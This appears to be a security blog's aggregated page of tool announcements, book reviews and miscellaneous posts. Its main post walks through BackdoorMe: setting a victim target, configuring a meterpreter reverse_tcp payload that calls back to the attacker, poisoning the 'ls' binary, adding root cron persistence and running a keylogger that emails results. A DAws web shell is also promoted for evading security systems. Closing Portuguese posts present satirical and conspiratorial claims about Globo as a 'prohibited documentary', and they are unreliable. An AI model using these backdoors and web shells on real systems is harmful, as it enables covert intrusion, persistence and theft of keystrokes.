BackdoorMe - Powerful Auto-Backdooring Utility

Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility.

Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: https://help.ubuntu.com/community/SSH/OpenSSH/Configuring

Please only use Backdoorme with explicit permission - please don't hack without asking.

Usage

Backdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence.

To start backdoorme, first ensure that you have the required dependencies.

$ python dependencies.py

Launching backdoorme:

$ python master.py    

 ___           __      __              __  ___
  / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__
 / _  / _ `/ __/  '_/ _  / _ \/ _ \/ __/ /|_/ / -_)
/____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/  /_/\__/

Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.  Type "addtarget" to set a target, and "open" to open an SSH connection to that target.  Using local IP of 10.1.0.1.  >>  

To add a target:

>> addtarget  Target Hostname: 10.1.0.2  Username: victim  Password: password123   + Target 1 Set!  >>  

Backdoors

To use a backdoor, simply run the "use" keyword.

>> use metasploit   + Using current target 1.   + Using Metasploit backdoor...  (msf) >>  

From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.

(msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        initd       name of the backdoor        False  format      elf     format to write the backdoor to     True  lhost       10.1.0.1        local IP to connect back to     True  encoder     none        encoder to use for the backdoor     False  lport       4444        local port to connect back on       True  payload     linux/x86/meterpreter/reverse_tcp       payload to deploy in backdoor       True  (msf) >> set name apache   + name => apache  (msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        apache      name of the backdoor        False  ...  

Currently enabled backdoors include:

• Bash
• Bash2 (more reliable)
• Metasploit
• Netcat
• Netcat-traditional
• Perl
• Php (does not automatically install a web server, but use the web module!)
• Pupy
• Python
• Web (php - not the same backdoor as the above php backdoor)

Modules

Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.

(msf) >> add poison + Poison module added  

Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.

(msf) >> help  ...  Poison module options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        ls        name of command to poison     False  location /bin       where to put poisoned files into        False  

Currently enabled modules include:

• Poison
  • Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor.
  • For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.
• Cron
  • Adds an existing backdoor to the root user's crontab to run with a given frequency.
    
• Web
  • Sets up a web server and places a web page which triggers the backdoor.
  • Simply visit the site with your listener open and the backdoor will begin.
• Keylogger
  • Ships a keylogger to the target and starts it.
  • Given the option to email the results to you every hour.
• User
  • Adds a new user to the target.
• Startup
  • Allows for backdoors to be spawned with the bashrc and init files.

Auxiliaries

In order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the "apply" keyword.

>> apply user  + User Auxiliary Module added.  

Auxiliaries also support the use of modules, so they can be triggered more steathily or more often.

>> (user) add startup  + Startup Module added.  

Currently enabled auxiliaries include:

• User
  • Adds a new user to the target.

Targets

Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target.

Download BackdoorMe

Read More

Mastering Kali Linux - For Advanced Penetration Testing

This is undoubtedly one of the most well written books of all times. Like previous book It also go around Kali Linux but in a different manner. You might have a different taste of the way of learning, so this can be a good choice for you.

It provides crisp and clear writing with relevant examples along with a humorous touch to enliven the dry and mundane subject. The contents of the book are well organized in a neither too chatty nor too dry manner. However, you require some basic networking background to derive full benefits from this book.






By Offensive Sec

Read More

The Hacker Playbook 2 - Practical Guide To Penetration Testing

Surprisingly the second edition of the book is not just a simple edit. Writer has put in much effort in this book to stand out of the league and make it a real sequel of the previous legacy that Hacker’s Playbook 1 left behind. Not only you will learn some amazing techniques but also there are a lot more new techniques than the previous print.

This could be your Guru Book for the time. I have personally read it and would give a 5-Star rating easily.

Unlike other books this covers a broad variety of tools, methods of penetration testing where other books might be useful to you to cover the verticals of a specific tool/technique. This book outperforms any other book on penetration testing for beginners and advanced penetration tester.






By Offensive Sec

Read More

DAws - Advanced Web Shell

About

There's multiple things that makes DAws better than every Web Shell out there:

º Bypasses Security Systems using various methods.
º Drops CGI Shells and communicate with them to bypass Security Systems.
º Uses the SSH Authorized Keys method to bypass Security Systems.
º Uses Shellshock to bypass Security Systems.
º Is completely Post Based and uses a XOR Encryption based on a random key that gets       generated with every new session + private base64 functions to bypass Security Systems.
º Supports Windows and Linux.
º Find a writeable and readable directory and moves there if it's a web directory.
º Drops a php.ini and a .htaccess file that clears all disablers incase "suphp" was installed.
º Has an advanced File Manager
º Mostly everything is done automatically (when it comes to command or script execution)



Credits:

º dotcppfile
º Aces who helped me code the old version of DAws
º Vedu for checking and reporting bugs.


     

Download DAws Advanced Web Shell

Read More

Hackazon - A Modern Vulnerable Web App

Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today’s rich client and mobile applications. Hackazon has an AJAX interface, strict workflows and RESTful API’s used by a companion mobile app providing uniquely-effective training and testing ground for IT security professionals. And, it’s full of your favorite vulnerabilities like SQL Injection, cross-site scripting and so on.

Today’s web and mobile applications as well as web services have a host of new technologies that are not being adequately tested for security vulnerabilities. It is critical for IT security professionals to have a vulnerable web application to use for testing the effectiveness of their tools and for honing their skills.

Hackazon enables users to configure each area of the application in order to change the vulnerability landscape to prevent “known vuln testing” or any other form of ‘cheating.’ Since the application includes RESTful interfaces that power AJAX functionality and mobile clients (JSON, XML, GwT, and AMF), users will need to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications. to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications.

Features

• REST Support - http://www.w3.org/2001/sw/wiki/REST
• GWT Support - http://www.gwtproject.org
• AJAX and Standard HTTP Requests are Supported

Technical Details

• PHP Version – 5.4
• PHP Framework – http://phpixie.com/
• JS – http://jquery.com/ & http://knockoutjs.com/
• CSS – http://getbootstrap.com/
• DB – MySQL 5.5 with InnoDB Support
• Web Server – Apache 2.0

Additional Information

• Wiki
• CyberSecology Blog: Hackazon Test Site Review

Installation

1. Checkout the code
2. Set DOCUMENT_ROOT directory to /web. Make sure that htaccess and REWRITE support is enabled.
3. Copy /assets/config/db.sample.php to /assets/config/db.php
4. Change settings for DB connection in the /assets/config/db.php
5. Open http://yoursitename/install

Code structure:

• ROOT
• assets
• classes
• database
• modules
• vendor
• web

Download Hackazon

Read More

Intercepting Proxy - The Pappy Proxy

The Pappy (Proxy Attack Proxy Proxy) Proxy is an intercepting proxy for performing web application security testing. Its features are often similar, or straight up rippoffs from Burp Suite. However, Burp Suite is neither open source nor a command line tool, thus making a proxy like Pappy inevitable. The project is still in its early stages, so there are bugs and only the bare minimum features, but it should be able to do some cool stuff soon


Installation

Pappy supports OS X and Linux (sorry Windows). Installation requires pip or some other command that can handle a setup.py with requirements. Once the requirements are installed, you can check that it installed correctly by running pappy -l to start the proxy.


$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install.


Quickstart

Pappy projects take up an entire directory. Any generated scripts, exported responses, etc. will be placed in the current directory so it’s good to give your project a directory of its own. To start a project, do something like:

$ mkdir test_project
$ cd test_project 
$ pappy
Copying default config to directory
Proxy is listening on port 8000
itsPappyTime> exit
$ ls
data.db      project_config.json
$ 

And that’s it! The proxy will by default be running on port 8000 and bound to localhost . You can modify the port/interface in config.json. You can list all your intercepted requests with ls, view a full request with vfq <reqid> or view a full response with vfs <reqid>. Right now, the only command to delete requests is filter_prune which deletes all the requests that aren’t in the current context (look at the sections on the context/filter strings for more information on that).

Documentation

Download The Pappy Proxy

Read More

Documentary - DEFCON And Movie The Algorithm

If you have not seen , be sure to check these two great tips !
The documentary titled DEFCON : The Documentary , was launched in 2013 and focuses on the world of hacking conference, which celebrated its 20th anniversary in 2012. The film follows the four days of the twentieth edition of the conference, events and people ( participants and staff) , and covers the history and philosophy behind the success of DEFCON .

The movie ALGORITHM : The Hacker Movie , has as its protagonist a freelance computer hacker who breaks into a secret contractor of the US government and downloads a program. He then must choose between his own curiosity and the lives of your friends.



By OffensiveSec

Read More

Documentary Prohibited - BBC About The REDE ESGOTO (Globo)

A Rede Globo, também conhecida como Rede Bobo, Rede Lobo, Rede Glóbulo, Rede Esgoto, Rede GloBosta, GloBobagem, GloBobeira, Vênus Platinada e Toda Poderosa, é uma emissora de TV que é dos mesmos donos da Grécia e possui 99% das ações no Brasil, apesar de que todas as ações brasileiras são originadas dessa peste, além de possuírem propriedade patenteada da mente de cada Brasileiro.

Eles são quem fazem o Jornal Nacional, programa apresentadas por dois engomadinhos que ganham rios de dinheiro com mensagens subliminares.

São donos de outros países sem muita importância, como a Nicarágua, onde até pouco tempo atrás os chipanzés escritores de novelas eram amestrados, mas como esse foram substituídos por ratos de laboratório, a Nicarágua foi transformada em um camarim para o Faustão, visto que o seu antigo camarim ocupava todo o Projac.

Source: Internet

By OffensiveSec 

Read More

Well come to the planet earth

Well come to the planet earth

Este planeta é lindo! Mas não passa de um grande pasto para ovelhas e gados, que são controlados há muito tempo pelas mesmas linhagens sanguíneas de pastores ou donos da fazenda.

Devido à isso, pessoas evoluidas, mentalmente, psiquicamente, espiritualizadas de uma maneira sutil e sem doutrinas, mentes abertas e etc...

Estes não são bem vindos aqui são considerados divergentes e forças ocultas que aqui imperam, sempre dão um jeito de isolá-los, muitas vezes através de doenças mentais.

Em geral esses já nasceram despertos desde suas origens, vem aqui pagar penitência e com a missão de ajudar, em geral não conseguem, preferem observar e não se expor. 
Bem vindo a terra!

Source: Peter Fiuza.

By OffensiveSec

Read More